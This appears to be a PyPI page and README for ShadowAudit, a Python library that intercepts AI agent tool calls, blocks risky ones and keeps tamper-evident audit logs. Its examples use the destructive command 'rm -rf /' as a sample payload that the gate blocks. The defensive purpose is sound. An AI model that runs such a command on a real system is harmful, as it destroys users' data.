
Runtime governance for AI agents — deterministic fail-closed enforcement. Wraps any agent tool and blocks dangerous calls before execution. Zero LLM calls, zero cloud dependencies, works offline.


ShadowAudit

Runtime governance for AI agents — deterministic fail-closed enforcement with auditor-defensible cryptographic audit logs.

License: MIT | Tests: 226 passed


ShadowAudit sits between your agent and its tools. It evaluates every call before execution and blocks anything that exceeds your risk threshold. Three things differentiate it from horizontal governance toolkits like Microsoft AGT: (1) auditor-defensible cryptographic audit logs — every decision is hash-chained and optionally Ed25519-signed, producing evidence conformity assessors accept; (2) financial-vertical taxonomy depth — built-in Stripe, Plaid, and fintech-specific risk categories out of the box; (3) air-gap-first deployment — single pip install, zero external calls, works inside isolated VPCs and on-prem.

Agent → ShadowAudit Gate → Tool (allowed)
                         → Blocked (AgentActionBlocked raised)

Why ShadowAudit?

Problem | ShadowAudit's Answer
------- | --------------------
Agents execute arbitrary shell commands | Keyword + regex + AST risk scoring with configurable thresholds
No audit trail for agent decisions | Hash-chained, tamper-evident SQLite audit log with SHA-256 linkage and optional Ed25519 signing
Can't prove compliance to auditors | Professional HTML reports with SOX/PCI-DSS mappings + EU AI Act Annex IV evidence pack generator
Agent behavior drifts over time | Adaptive scoring with behavioral state tracking (K/V metrics)
CI/CD deploys unsafe agents | --fail-on-ungated flag blocks deployments
Legal team blocks cloud-dependent tools | Works fully offline: zero external calls
EU AI Act Annex IV evidence required | Built-in evidence pack generator (JSON + HTML)

vs Microsoft Agent Governance Toolkit (AGT)

"AGT is the right horizontal governance toolkit. ShadowAudit is the auditor-defensible, financial-vertical, air-gap-ready layer for regulated workloads. Run both — AGT for breadth, ShadowAudit for the audit evidence your conformity assessor will actually accept."

See docs/POSITIONING.md for a detailed, honest comparison.

Dimension | Microsoft AGT | ShadowAudit
--------- | ------------- | -----------
License | MIT | MIT (OSS SDK)
Coverage | All 10 OWASP Agentic risks | 3–5 of 10, focused on tool-call execution
Vendor | Microsoft | Independent
Audit log | Standard logging | Hash-chained, Ed25519-signed, tamper-evident
Vertical taxonomies | Generic | Financial / fintech depth (Stripe, Plaid)
Air-gap deployment | Possible but assembly required | First-class: single pip install
EU AI Act evidence pack | Compliance module exists | Annex IV evidence-pack generator built-in
Solo-buyable for SMBs | No | Yes

Hosted dashboard and managed cloud tier in development — contact for early access.

Quick Start

pip install shadowaudit

CLI: 4 commands to get started

# 1. Scan your codebase for ungated AI agent tools
shadowaudit check ./src

# 2. Generate a risk assessment with compliance mappings
shadowaudit assess ./src --taxonomy financial --compliance

# 3. Verify your audit log hasn't been tampered with
shadowaudit verify audit.db

# 4. Analyse decisions and get threshold tuning suggestions
shadowaudit tune --audit-log audit.db

For the full CLI reference (all 8 commands with flags and examples), see docs/CLI.md.

Python API: wrap any tool in a few lines

from shadowaudit import Gate

gate = Gate()
result = gate.evaluate(
    agent_id="agent-1",
    task_context="shell_tool",
    risk_category="execute",
    payload={"command": "rm -rf /"},
)
print(result.passed)        # False
print(result.risk_score)    # 0.11 (varies by payload)
print(result.reason)        # "drift_detected"

Framework adapters: LangChain (ShadowAuditTool), CrewAI (ShadowAuditCrewAITool), LangGraph (ShadowAuditToolNode), OpenAI Agents SDK (ShadowAuditOpenAITool), and MCP (MCPGatewayServer + ShadowAuditMCPSession). See examples/ for runnable scripts for each.


Features

Tamper-Evident Audit

Every gate decision is recorded in an append-only SQLite log. Entries are hash-chained via SHA-256 — modify any row and the chain breaks. Optional Ed25519 signing cryptographically proves authenticity. Verified with shadowaudit verify. See examples/tamper_demo.py for a live demonstration.
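
To make the hash-chaining idea concrete, here is a minimal sketch using only the standard library. It is not ShadowAudit's implementation: the table layout, the `GENESIS` placeholder, and the helper names `entry_hash`, `append`, and `verify` are assumptions made for illustration, and Ed25519 signing is left out.

```python
import hashlib
import json
import sqlite3

GENESIS = "0" * 64  # assumed placeholder "previous hash" for the first entry


def entry_hash(prev_hash: str, record: dict) -> str:
    """SHA-256 over the previous hash plus a canonical JSON encoding of the record."""
    body = json.dumps(record, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + body).encode("utf-8")).hexdigest()


def append(conn: sqlite3.Connection, record: dict) -> None:
    """Append a record, linking it to the hash of the latest row."""
    row = conn.execute("SELECT hash FROM audit ORDER BY id DESC LIMIT 1").fetchone()
    prev = row[0] if row else GENESIS
    conn.execute(
        "INSERT INTO audit (record, prev_hash, hash) VALUES (?, ?, ?)",
        (json.dumps(record, sort_keys=True), prev, entry_hash(prev, record)),
    )


def verify(conn: sqlite3.Connection) -> bool:
    """Recompute every link in order; an edited row no longer matches its stored hash."""
    prev = GENESIS
    rows = conn.execute("SELECT record, prev_hash, hash FROM audit ORDER BY id")
    for record_json, prev_hash, stored in rows:
        if prev_hash != prev or entry_hash(prev, json.loads(record_json)) != stored:
            return False
        prev = stored
    return True


conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE audit (id INTEGER PRIMARY KEY, record TEXT, prev_hash TEXT, hash TEXT)"
)
append(conn, {"agent_id": "agent-1", "passed": False, "reason": "blocked"})
append(conn, {"agent_id": "agent-2", "passed": True, "reason": "ok"})
intact_before = verify(conn)

# Simulate tampering: flip a stored decision without recomputing any hashes.
tampered = json.dumps({"agent_id": "agent-1", "passed": True, "reason": "blocked"}, sort_keys=True)
conn.execute("UPDATE audit SET record = ? WHERE id = 1", (tampered,))
intact_after = verify(conn)

print(intact_before, intact_after)  # True False
```

Because each hash covers the previous one, an attacker who edits a row would have to recompute every later hash as well; signing the entries is what would make that recomputation detectable too.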

Observe Mode & Bypass

Roll out enforcement gradually with Gate(mode="observe"): calls are logged but never blocked, and result.metadata["would_have_blocked"] tells you what enforce mode would have done. For human-approved overrides, use the bypass() context manager; every bypass is recorded in the audit log with a mandatory reason string.

from shadowaudit import Gate

# Example inputs (same shape as the Quick Start call)
agent_id, task, category = "agent-1", "shell_tool", "execute"
payload = {"command": "rm -rf /"}

# Shadow mode: log everything, block nothing
gate = Gate(mode="observe")
result = gate.evaluate(agent_id, task, category, payload)
print(result.metadata["would_have_blocked"])   # True if enforce would have blocked

# Bypass with immutable audit trail
with gate.bypass("agent-1", reason="approved by oncall #4521"):
    result = gate.evaluate("agent-1", task, category, payload)

Use shadowaudit tune --audit-log audit.db to analyse block rates per category and get threshold adjustment suggestions.
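
As a rough illustration of the kind of per-category analysis described here, the sketch below computes block rates from observe-mode decisions. The row shape and the `block_rates` helper are hypothetical; this is not how `shadowaudit tune` reads the audit log or derives its suggestions.

```python
from collections import defaultdict

# Hypothetical rows as they might be exported from an observe-mode audit log:
# (risk_category, would_have_blocked)
decisions = [
    ("execute", True),
    ("execute", True),
    ("execute", False),
    ("payment", False),
    ("payment", False),
    ("payment", True),
    ("payment", False),
]


def block_rates(rows):
    """Return {category: fraction of calls that enforce mode would have blocked}."""
    totals = defaultdict(int)
    blocked = defaultdict(int)
    for category, would_block in rows:
        totals[category] += 1
        blocked[category] += int(would_block)
    return {category: blocked[category] / totals[category] for category in totals}


rates = block_rates(decisions)
for category, rate in sorted(rates.items()):
    print(f"{category}: {rate:.0%} of calls would be blocked")
```

A category with an unexpectedly high rate during an observe-mode rollout is a natural candidate for a threshold review before switching to enforcement.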

Multi-Agent Trust Propagation

FlowTracer tracks how data moves between agents and propagates trust downward. If Agent A processes untrusted web content, any payload that flows from A into Agent B's tool call is automatically tagged UNTRUSTED — regardless of B's own trust level.

from shadowaudit import FlowTracer, TrustLevel

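# Placeholder payloads for illustration
scraped_data = "<html>untrusted page content</html>"
parsed_data = {"summary": "untrusted page content"}

tracer = FlowTracer()
tracer.record_output("web-scraper", scraped_data, trust=TrustLevel.UNTRUSTED)
tracer.record_flow("web-scraper", "summariser", parsed_data)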

annotation = tracer.annotate(
    receiving_agent="payment-agent",
    source_agents=["summariser"],
    declared_trust=TrustLevel.SYSTEM,
)
print(annotation.effective_trust)   # TrustLevel.UNTRUSTED
print(annotation.contaminated_by)   # ['web-scraper']
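
The propagation rule can be pictured as taking the minimum trust level over everything upstream of a call. The toy model below is a sketch under that assumption, not FlowTracer's code: `Trust`, `ToyTracer`, and the three-level ordering are invented for illustration.

```python
from enum import IntEnum


class Trust(IntEnum):
    """Hypothetical ordering: a lower value means less trusted."""
    UNTRUSTED = 0
    USER = 1
    SYSTEM = 2


class ToyTracer:
    def __init__(self):
        self.output_trust = {}  # agent -> trust recorded for its own output
        self.upstream = {}      # agent -> set of agents whose data it received

    def record_output(self, agent, trust):
        self.output_trust[agent] = trust

    def record_flow(self, source, target):
        self.upstream.setdefault(target, set()).add(source)

    def effective_trust(self, source_agents, declared):
        """Walk upstream from the sources; the result is the lowest trust seen."""
        lowest, contaminated_by = declared, []
        stack, seen = list(source_agents), set()
        while stack:
            agent = stack.pop()
            if agent in seen:  # guards against cycles in the flow graph
                continue
            seen.add(agent)
            trust = self.output_trust.get(agent)
            if trust is not None and trust < declared:
                contaminated_by.append(agent)
                lowest = min(lowest, trust)
            stack.extend(self.upstream.get(agent, ()))
        return lowest, sorted(contaminated_by)


tracer = ToyTracer()
tracer.record_output("web-scraper", Trust.UNTRUSTED)
tracer.record_flow("web-scraper", "summariser")

effective, sources = tracer.effective_trust(["summariser"], declared=Trust.SYSTEM)
print(effective.name, sources)  # UNTRUSTED ['web-scraper']
```

The point of the transitive walk is that the receiving agent never has to know about the scraper directly: contamination follows the data through intermediate agents.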

Vertical Taxonomies

Built-in starter packs across 6 domains: general, financial (32 categories — Stripe, Plaid, wire transfers, KYC/AML), financial crypto (18 categories), healthcare (17 categories), legal, and open banking. Each taxonomy defines risk keywords, threshold deltas, severity levels, and compliance mappings. Build custom taxonomies interactively with shadowaudit build-taxonomy.

Framework Coverage

First-class adapters for LangChain, CrewAI, LangGraph, OpenAI Agents SDK, and MCP (gateway + in-process). Drop-in wrappers — same interface, automatic enforcement. Works with any tool that has name, description, and run().
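
A drop-in wrapper over the name / description / run() interface might look roughly like the sketch below. It does not use the ShadowAudit adapters: `GatedTool`, `EchoTool`, and the `is_allowed` callable are hypothetical, and `AgentActionBlocked` is redefined locally as a stand-in for the exception named in the flow diagram near the top of this README.

```python
class AgentActionBlocked(Exception):
    """Local stand-in for the exception raised when a call is blocked."""


class EchoTool:
    """A trivial duck-typed tool: name, description, and run()."""
    name = "echo"
    description = "Returns its input unchanged."

    def run(self, text: str) -> str:
        return text


class GatedTool:
    """Wraps any object exposing name, description, and run()."""

    def __init__(self, tool, is_allowed):
        self._tool = tool
        self._is_allowed = is_allowed  # hypothetical callable: (tool_name, payload) -> bool
        self.name = tool.name
        self.description = tool.description

    def run(self, *args, **kwargs):
        payload = {"args": args, "kwargs": kwargs}
        try:
            allowed = self._is_allowed(self.name, payload) is True
        except Exception:
            allowed = False  # fail closed: a broken policy check blocks the call
        if not allowed:
            raise AgentActionBlocked(f"{self.name} blocked before execution")
        return self._tool.run(*args, **kwargs)


def deny_rm(tool_name, payload):
    """Toy policy: reject any call whose arguments mention 'rm -rf'."""
    return "rm -rf" not in str(payload)


tool = GatedTool(EchoTool(), deny_rm)
ok = tool.run("hello")
try:
    tool.run("rm -rf /")
    blocked = False
except AgentActionBlocked:
    blocked = True

print(ok, blocked)  # hello True
```

Keeping the wrapper's public surface identical to the wrapped tool is what lets a framework use it without knowing a gate sits in between.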

Compliance Reporting

Generate professional HTML reports with executive summaries, risk breakdowns, and remediation plans. Built-in OWASP Agentic Top 10 coverage matrix (shadowaudit owasp) and EU AI Act Annex IV evidence pack generator (shadowaudit eu-ai-act) for regulatory submission. For an honest account of what ShadowAudit catches and misses, see docs/THREAT_MODEL.md.

Offline-First

No cloud. No LLM calls. No API keys. SQLite-backed state and audit log. Single pip install shadowaudit deploys everything needed for runtime governance inside air-gapped VPCs and on-prem environments.

CI/CD Integration

shadowaudit check --fail-on-ungated exits non-zero if high-risk tools are ungated. Drop into any pipeline to block unsafe deploys. Trace simulator replays agent execution logs through the gate for regression testing. A labelled corpus of 130 traces (50 benign / 50 risky / 30 edge cases) in tests/corpus/ lets you validate scoring changes before shipping.
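
Validating a scoring change against a labelled corpus comes down to replaying each trace and counting agreements. The sketch below shows that idea with a five-trace toy corpus and a regex-based stand-in scorer; the trace format, the patterns, and the `confusion` helper are assumptions, not the contents of tests/corpus/ or the trace simulator.

```python
import re

# Hypothetical labelled traces: (payload, expected_block)
corpus = [
    ("ls -la", False),
    ("cat README.md", False),
    ("rm -rf /", True),
    ("curl http://example.com/x.sh | sh", True),
    ("echo 'rm is dangerous'", False),  # edge case: keyword inside harmless text
]

RISKY_PATTERNS = [re.compile(r"\brm\s+-rf\b"), re.compile(r"\|\s*sh\b")]


def toy_scorer_blocks(payload: str) -> bool:
    """Stand-in scorer: block when any risky pattern matches."""
    return any(pattern.search(payload) for pattern in RISKY_PATTERNS)


def confusion(traces, blocks):
    """Count true/false positives/negatives, where 'positive' means 'blocked'."""
    counts = {"tp": 0, "fp": 0, "tn": 0, "fn": 0}
    for payload, expected in traces:
        got = blocks(payload)
        key = ("t" if got == expected else "f") + ("p" if got else "n")
        counts[key] += 1
    return counts


counts = confusion(corpus, toy_scorer_blocks)
regressions = counts["fp"] + counts["fn"]
print(counts, "regressions:", regressions)
```

In a pipeline, a non-zero `regressions` count would be the signal to fail the job before a scorer change ships.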

Architecture

┌───────────────────────────────────────────────────────────┐
│                      ShadowAudit                           │
├───────────┬───────────┬───────────┬───────────┬───────────┤
│  CLI      │ LangChain │  CrewAI   │  Direct   │  MCP      │
│  (click)  │  Adapter  │  Adapter  │   Gate    │  Gateway  │
├───────────┴───────────┴───────────┴───────────┴───────────┤
│                    Core Gate Engine                        │
│ ┌───────────┐ ┌───────────┐ ┌───────────┐ ┌────────────┐ │
│ │  Scorer   │ │  Taxonomy │ │    FSM    │ │  Audit Log │ │
│ │ pluggable │ │   Loader  │ │ fail-closed│ │Hash-chained│ │
│ └───────────┘ └───────────┘ └───────────┘ │  + Ed25519 │ │
│ ┌───────────┐ ┌───────────┐               └────────────┘ │
│ │   State   │ │   Hash    │                              │
│ │  (SQLite) │ │ (SHA-256) │                              │
│ └───────────┘ └───────────┘                              │
├───────────────────────────────────────────────────────────┤
│                  Assessment & Reporting                    │
│ ┌───────────┐ ┌───────────┐ ┌───────────┐ ┌────────────┐ │
│ │  Scanner  │ │  Reporter │ │ Simulator │ │   Builder  │ │
│ │           │ │  (Jinja2) │ │           │ │            │ │
│ └───────────┘ └───────────┘ └───────────┘ └────────────┘ │
└───────────────────────────────────────────────────────────┘

How a tool call is evaluated

  1. Agent calls a tool → intercepted by the framework adapter or direct Gate.evaluate()
  2. Taxonomy lookup → finds risk category config (keywords, threshold delta, severity)
  3. Scoring → pluggable scorer computes risk score from payload content
  4. Threshold comparison → score vs. taxonomy delta determines pass/fail
  5. Mode / bypass check → observe mode always passes; active bypass() overrides a block
  6. FSM transition → fail-closed state machine: anything not an explicit pass is a block
  7. Audit log → decision recorded with timestamp, agent ID, payload hash, and reason
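
The steps above can be sketched as a single function. This is a toy model under stated assumptions, not the Core Gate Engine: the `TAXONOMY` dict, the `threshold` field, the keyword-fraction scorer, and the reason strings are all invented for illustration, and the bypass check from step 5 is omitted.

```python
import hashlib
import json
import time
from dataclasses import dataclass, field

# Hypothetical taxonomy: category -> keywords and the score at which a call is blocked.
TAXONOMY = {
    "execute": {"keywords": ["rm -rf", "sudo", "mkfs"], "threshold": 0.3},
    "read": {"keywords": ["/etc/shadow"], "threshold": 0.5},
}


@dataclass
class Result:
    passed: bool
    risk_score: float
    reason: str
    metadata: dict = field(default_factory=dict)


def keyword_score(payload: dict, keywords: list) -> float:
    """Toy scorer: fraction of the category's keywords present in the payload."""
    text = json.dumps(payload, sort_keys=True).lower()
    return sum(k in text for k in keywords) / len(keywords) if keywords else 0.0


def evaluate(agent_id, risk_category, payload, mode="enforce", audit=None):
    # Fail-closed defaults: only an explicit pass below can change the verdict.
    score, verdict, reason = 1.0, "block", "evaluation_error"
    try:
        config = TAXONOMY.get(risk_category)                      # step 2: taxonomy lookup
        if config is None:
            reason = "unknown_category"
        else:
            score = keyword_score(payload, config["keywords"])    # step 3: scoring
            if score < config["threshold"]:                       # step 4: threshold comparison
                verdict, reason = "pass", "below_threshold"
            else:
                reason = "threshold_exceeded"
    except Exception:
        score, verdict, reason = 1.0, "block", "evaluation_error"
    would_block = verdict != "pass"                               # step 6: anything else blocks
    passed = mode == "observe" or not would_block                 # step 5: observe never blocks
    record = {                                                    # step 7: audit record
        "ts": time.time(),
        "agent_id": agent_id,
        "passed": passed,
        "reason": reason,
        "payload_sha256": hashlib.sha256(
            json.dumps(payload, sort_keys=True, default=str).encode("utf-8")
        ).hexdigest(),
    }
    if audit is not None:
        audit.append(record)
    return Result(passed, score, reason, {"would_have_blocked": would_block})


audit_log = []
blocked = evaluate("agent-1", "execute", {"command": "rm -rf /"}, audit=audit_log)
allowed = evaluate("agent-1", "execute", {"command": "ls"}, audit=audit_log)
observed = evaluate("agent-1", "execute", {"command": "rm -rf /"}, mode="observe", audit=audit_log)
unknown = evaluate("agent-1", "no-such-category", {"command": "ls"}, audit=audit_log)
print(blocked.passed, allowed.passed, observed.passed, unknown.passed)  # False True True False
```

Note that the unknown category and any scoring error both end in a block: the verdict starts as "block" and only an explicit below-threshold result flips it, which is the fail-closed property the FSM step describes.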

Installation

# Base install — CLI + core gate (click, jinja2)
pip install shadowaudit

# With LangChain adapter
pip install shadowaudit[langchain]

# With CrewAI adapter (Python 3.10–3.12)
pip install shadowaudit[crewai]

# Development
pip install shadowaudit[dev]

Requirements: Python 3.10+

Examples

See the examples/ directory for runnable scripts:

Example | Description
------- | -----------
local_only.py | Direct Gate usage, no framework dependencies
langchain_agent.py | LangChain agent with ShadowAudit-wrapped tools
hash_chain_demo.py | Hash-chained audit log with tamper detection
tamper_demo.py | Live tamper-evidence demo: corrupt a row, watch the chain break
fintech_payment_agent.py | Production-style payment agent with Gate enforcement and retry logic
langgraph_demo.py | LangGraph ShadowAuditToolNode integration
eu_ai_act_demo.py | EU AI Act Annex IV evidence pack generation

Run all examples at once:

python examples/run_all_examples.py

For the full example index (14 scripts covering every v0.4.0 feature), see docs/FEATURES.md.

Testing

Quick smoke test after installing:

shadowaudit --version && \
shadowaudit check . && \
shadowaudit owasp && \
python -c "from shadowaudit.core.gate import Gate; print(Gate().evaluate(agent_id='smoke-test', task_context='shell_tool', risk_category='execute', payload={'command': 'ls'}).passed)"

For the full testing guide, see docs/TESTING_GUIDE.md.

Project Status

ShadowAudit is v0.4.0 — production-ready for audit-time scanning and assessment workflows; runtime gating is in early-adopter use. APIs may evolve before v1.0.0; breaking changes require a major version bump and migration guide.

  • ✅ Core gate + 5 framework adapters (LangChain, CrewAI, LangGraph, OpenAI Agents, MCP)
  • ✅ Hash-chained, Ed25519-signed audit log with integrity verification
  • ✅ Observe mode, bypass context manager, and threshold tuning CLI
  • ✅ Multi-agent trust propagation via FlowTracer
  • ✅ Vertical taxonomies (general, financial 32-cat, financial_crypto, healthcare, legal, Plaid) + interactive builder
  • ✅ Labelled test corpus (130 traces) + scorer benchmark
  • ✅ Compliance reporting (OWASP matrix, EU AI Act Annex IV evidence packs)
  • ✅ Honest threat model — what ShadowAudit catches and what it doesn't (docs/THREAT_MODEL.md)
  • ✅ Offline-first — zero external calls, air-gap ready

Contributing

Bug reports and pull requests are welcome. See CONTRIBUTING.md for development setup, testing, and the PR process.

git clone https://github.com/AnshumanKumar14/shadowaudit-python.git
cd shadowaudit-python
pip install -e ".[dev,langchain]"
pytest tests/ -q

License

MIT — see LICENSE.


Built by Anshuman Kumar

Download files

Source distribution: shadowaudit-0.5.0.tar.gz (139.9 kB)

  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.14.4
  • SHA256: 52e311597e17005973f3dccbc52760a728a2a7fedea4786bac879db7f8031b06
  • MD5: 141b5ee30f94f0293504e30b1d54e655
  • BLAKE2b-256: 9951dbe68c9de171079156315e47886d9ea46e6d1a2dcc69a07e69facbc75288

Built distribution: shadowaudit-0.5.0-py3-none-any.whl (99.8 kB)

  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.14.4
  • SHA256: a4f0b1669dfc6235486fd1e3dd3f59b56ca297b263750809c5e3d1bcc539520f
  • MD5: 375d3305a7b0d65fa7526221a7f5240b
  • BLAKE2b-256: b9d63b2f8af5873d56966de7d9b8e24abdf69e1f562df73e8333457c6cbb7a89
